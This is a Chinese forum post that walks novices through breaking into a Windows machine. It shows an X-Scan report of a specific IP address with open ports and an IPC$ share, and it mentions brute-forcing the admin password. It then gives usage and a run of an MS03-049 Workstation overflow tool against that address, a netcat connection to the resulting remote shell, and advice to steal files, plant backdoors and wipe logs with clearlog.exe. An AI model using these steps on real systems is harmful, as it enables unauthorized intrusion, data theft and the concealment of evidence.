瑞星卡卡安全论坛

互连网的普及随之带来的很多问题，现在安全越来越让人们重视，让人感觉黑客无孔不入，对黑客的技术感到很神秘，都想知道黑客是怎么实现攻击的，今天我就来简单的讲讲黑客攻击的基本步骤。
让我们先来认识一下hacker这个词，有人认为它是计算机天才的代表词，有人认为它代表着攻击，到底hacker这个词是指什么呢？现在的媒体已经将这个词定义成贬义的了，其实在早期这个词是指哪些对计算机有很深研究的一部分人，他们有着很专业的计算机知识，今天媒体讨论的hacker这个词在黑客界只是代表cracker(有着和hacker一样的技术，但他们以搞破坏为主，以入侵窃取资料作为他们的工作和游戏)，但在黑客资料漫天飞的今天谈论这个已经没有意义了，因为hacker和cracker只隔着一层意念。
好了，我们不要在为hacker这个伤脑筋词在说什么了。来讲讲黑客是怎样入侵的吧。
黑客的入侵好比一场战斗，首先要做的就是探测，然后就是对得到的资料进行分析，整理入侵资料，制定入侵计划，最后才实施入侵，其实入侵的时间是很短的。也许这样讲还有很多人感到迷惑，那我就结合实际来讲讲吧。
首先，我们选择适合自己的扫描器：x-scan、x-way、流光、superscan,都是不错的扫描器,如果你是新手的话建议用流光和x-way(本人对这个两个软件强大的功能十分佩服，但不太喜欢用，本人偏爱的还是x-scan)。以下就是我用x-scan扫描到的一个机器的信息。
****************************************************************************************
X-Scan v2.3 检测报告
[扫描结果索引]: "218.91.237.159"
开放端口
SQL-Server弱口令
FTP弱口令
NT-Server弱口令
IIS漏洞
[NetBios信息]
远程注册表信息 服务器信息 主域控制器名称 网络传输列表 网络会话列表
网络服务器列表 网络磁盘列表 网络共享资源列表 网络用户列表 本地组列表
组列表 网络文件列表 计划任务列表 网络映射列表
--------------------------------------------------------------------------------
详细资料
[开放端口]
端口113开放: Authentication Service
[Banner]
[None]
[End of banner]
端口135开放: Location Service
[Banner]
[None]
[End of banner]
端口139开放: NETBIOS Session Service
[Banner]
[None]
[End of banner]
端口445开放: Microsoft-DS
[Banner]
[None]
[End of banner]

插件类型: PORT
插件成员名称: 开放端口
插件作者: glacier
插件版本: 1.7
风险等级: 低
漏洞描述: "安全焦点"漏洞搜索引擎 "安全焦点"漏洞利用程序搜索引擎
--------------------------------------------------------------------------------
[SQL-Server弱口令]
--------------------------------------------------------------------------------
[FTP弱口令]
--------------------------------------------------------------------------------
[NT-Server弱口令]
--------------------------------------------------------------------------------
[NetBios信息]
[服务器信息 Level 101]:
主机名称: "218.91.237.159"
操作系统: Windows NT
系统版本: 5.1
注释:""
主机类型: WORKSTATION SERVER POTENTIAL_BROWSER MASTER_BROWSER
[服务器时间]:
12-15-2003 15:38:59 GMT
[网络会话列表 Level 10]:
AMD\ 活动:151 Sec., 空闲:151 Sec.
AMD\ 活动:12 Sec., 空闲:0 Sec.
[网络服务器列表 Level 101]:
主机名称:"QUN7O0JUIPQX6WJ"
操作系统: NT v5.1
注释:""
主机类型: WORKSTATION SERVER POTENTIAL_BROWSER MASTER_BROWSER
[网络共享资源列表 Level 1]:
"IPC$": 进程间通信(IPC$) - [远程 IPC] (System)
插件类型: NETBIOS
插件成员名称: NetBios信息
插件作者: glacier
插件版本: 1.1
风险等级: 高
漏洞描述: "安全焦点"漏洞搜索引擎 "安全焦点"漏洞利用程序搜索引擎
--------------------------------------------------------------------------------
[IIS漏洞]
--------------------------------------------------------------------------------
扫描全部完成
*******************************************************************************************

从上面的报告来看我们得知的信息有以下几点：
1.主机的的操作系统为Windows NT 系统版本: 5.1 它的时间为 12-15-2003 15:38:59 GMT。
2.主机的名称为"QUN7O0JUIPQX6WJ"。
3.主机开放的端口有113 135 139 445。
4.主机有IPC$共享资源。
以上的信息足以发起一次攻击，但我们为了安全应该再多收集一些关于该主机的资料。对于以上的信息我们可以用最近最新的漏洞来攻击，比如它开着135和445我们就可以用workstation远程溢出漏洞来试试。也可以用crackerpasswd.exe来暴力破解它的管理员密码，总之开着135、139、445的主机是很危险的，有很多的漏洞就是基于这几个端口的。
上面的主机我也没攻击，为了大家能够了解攻击全过程，我们假设来攻击这个主机。我们就用最近刚发布的漏洞Windows Workstation远程溢出漏洞来攻击。我们可以到黑客站点获取溢出代码或者溢出工具，然后就是进行攻击。请看下面（下面只是一个假设的例子！）：
***********************************************************************************
D:\heike\tools\溢出>workstation.exe
Windows Workstation ms03-049 wkssvc.dll buffer overflow
bug discoveried by eEye,code by Hanabishi,shellcode by oc.192
Modified by sbaa(sbaa@163.net) 2003/11/16 ver 0.2
Usage:
On 2k :
workstation.exe IP --> attack 2k without ntfs
On xp :
workstation.exe IP 2k --> attack 2k without ntfs
workstation.exe IP --> attack xp
Next open another window : nc Ip 1234 --> Get cmd shell @.@
************************************************************************************
以上是工具的用法
*************************************************************************************
D:\heike\tools\溢出>workstation.exe 218.91.237.159
can’t find NetAddAlternateComputerName (Now try to attack 2k!)

出现如上信息的话，我们就可以用nc.exe来连接主机了
***********************************************************************************
D:\heike\tools\溢出>nc 218.91.237.159 1234
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\>WINNT\system32>
*************************************************************************************
到了这里我们就进入了主机，可以做自己想做的事了，找资料，做后门……等到一切都做好了以后我们就可以清除日志走人了
************************************************************************************
C:\>WINNT\system32>clearlog.exe